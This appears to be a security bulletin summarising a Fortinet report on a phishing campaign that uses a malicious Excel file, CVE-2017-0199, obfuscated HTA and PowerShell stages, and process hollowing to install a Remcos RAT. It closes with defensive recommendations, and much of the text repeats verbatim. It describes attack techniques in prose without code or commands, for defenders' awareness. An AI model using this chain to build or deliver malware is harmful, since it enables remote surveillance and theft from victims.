New Campaign Uses Remcos RAT to Exploit Victims
Summary:
Fortinet’s FortiGuard Labs recently identified a phishing campaign delivering a new Remcos RAT variant through a malicious Excel document attached to a phishing email. The attack starts with a convincing email that includes the Excel file, disguised as an order form to lure the recipient into opening it. Once opened, the document exploits the CVE-2017-0199 vulnerability, allowing remote code execution. This vulnerability downloads an HTA file via a crafted URL, executed through Excel’s DCOM components. The HTA file is heavily obfuscated, using layers of JavaScript, VBScript, Base64, and PowerShell to evade detection. This script then downloads an exe file to the %AppData% folder, initiating the core infection sequence.
The exe file unpacks additional files and launches PowerShell commands to establish persistence on the victim’s device by modifying system registry keys, enabling the malware to auto-start on reboot. Remcos deploys numerous anti-analysis techniques, including vectored exception handling, dynamic API resolution, and anti-debugging API calls (like ZwSetInformationThread and ZwQueryInformationProcess), making it difficult for analysts to study the malware’s behavior. Additionally, the malware uses process hollowing to inject itself into a newly created process, Vaccinerende[.]exe, effectively hiding its presence by making it appear as a legitimate process.
Security Officer Comments:
As a fileless malware, Remcos operates directly from memory rather than being saved on disk, making detection more challenging. A decrypted settings block embedded in Remcos controls its behavior, including configurations for communication with its command-and-control server. This settings block defines key parameters, such as the C&C server’s IP address, port, security protocols, and enabled features like keylogging, screenshot capture, and audio recording. After registering the infected device with the C&C server, Remcos relays detailed system information, including OS version, memory status, user privileges, and device runtime. It also enables the threat actor to execute commands, such as process management, file manipulation, and keystroke logging. Remcos communicates with its C&C server using a structured packet format, with TLS encryption securing the data exchanges. This new Remcos variant demonstrates sophisticated evasion and persistence techniques, leveraging a fileless, in-memory operation combined with multiple obfuscation layers, making it difficult for conventional security tools to detect.
Suggested Corrections:
IOCs:
https://www.fortinet.com/blog/threat-research/new-campaign-uses-remcos-rat-to-exploit-victims
https://www.fortinet.com/blog/threat-research/new-campaign-uses-remcos-rat-to-exploit-victims
https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0199
Fortinet’s FortiGuard Labs recently identified a phishing campaign delivering a new Remcos RAT variant through a malicious Excel document attached to a phishing email. The attack starts with a convincing email that includes the Excel file, disguised as an order form to lure the recipient into opening it. Once opened, the document exploits the CVE-2017-0199 vulnerability, allowing remote code execution. This vulnerability downloads an HTA file via a crafted URL, executed through Excel’s DCOM components. The HTA file is heavily obfuscated, using layers of JavaScript, VBScript, Base64, and PowerShell to evade detection. This script then downloads an exe file to the %AppData% folder, initiating the core infection sequence.
The exe file unpacks additional files and launches PowerShell commands to establish persistence on the victim’s device by modifying system registry keys, enabling the malware to auto-start on reboot. Remcos deploys numerous anti-analysis techniques, including vectored exception handling, dynamic API resolution, and anti-debugging API calls (like ZwSetInformationThread and ZwQueryInformationProcess), making it difficult for analysts to study the malware’s behavior. Additionally, the malware uses process hollowing to inject itself into a newly created process, Vaccinerende[.]exe, effectively hiding its presence by making it appear as a legitimate process.
Security Officer Comments:
As a fileless malware, Remcos operates directly from memory rather than being saved on disk, making detection more challenging. A decrypted settings block embedded in Remcos controls its behavior, including configurations for communication with its command-and-control server. This settings block defines key parameters, such as the C&C server’s IP address, port, security protocols, and enabled features like keylogging, screenshot capture, and audio recording. After registering the infected device with the C&C server, Remcos relays detailed system information, including OS version, memory status, user privileges, and device runtime. It also enables the threat actor to execute commands, such as process management, file manipulation, and keystroke logging. Remcos communicates with its C&C server using a structured packet format, with TLS encryption securing the data exchanges. This new Remcos variant demonstrates sophisticated evasion and persistence techniques, leveraging a fileless, in-memory operation combined with multiple obfuscation layers, making it difficult for conventional security tools to detect.
Suggested Corrections:
IOCs:
https://www.fortinet.com/blog/threat-research/new-campaign-uses-remcos-rat-to-exploit-victims
- Patch Management: Regularly update and patch software, especially applications like Microsoft Office. In this case, ensuring patches are applied to mitigate vulnerabilities like CVE-2017-0199 will prevent the exploit from executing.
- Email Security: Deploy advanced email filtering solutions to detect and block phishing emails with malicious attachments. Using features like attachment sandboxing, link scanning, and phishing detection in email gateways can significantly reduce the risk.
- Attachment Controls: Limit the execution of high-risk file types, such as HTA, VBScript, and macros in Office files, especially from unknown senders. Organizations can set policies to disable macros by default or enable only for trusted documents.
- Behavioral Analysis: Use endpoint detection and response tools to monitor for suspicious activities, such as unusual PowerShell executions, file extractions in sensitive directories, and processes like mshta.exe executing non-native code.
- Network Segmentation and Monitoring: Segment networks to contain potential infections and monitor for suspicious outbound connections to known malicious IPs and domains. Employing tools to analyze network traffic for anomalies can help detect and block C&C communications.
https://www.fortinet.com/blog/threat-research/new-campaign-uses-remcos-rat-to-exploit-victims
https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0199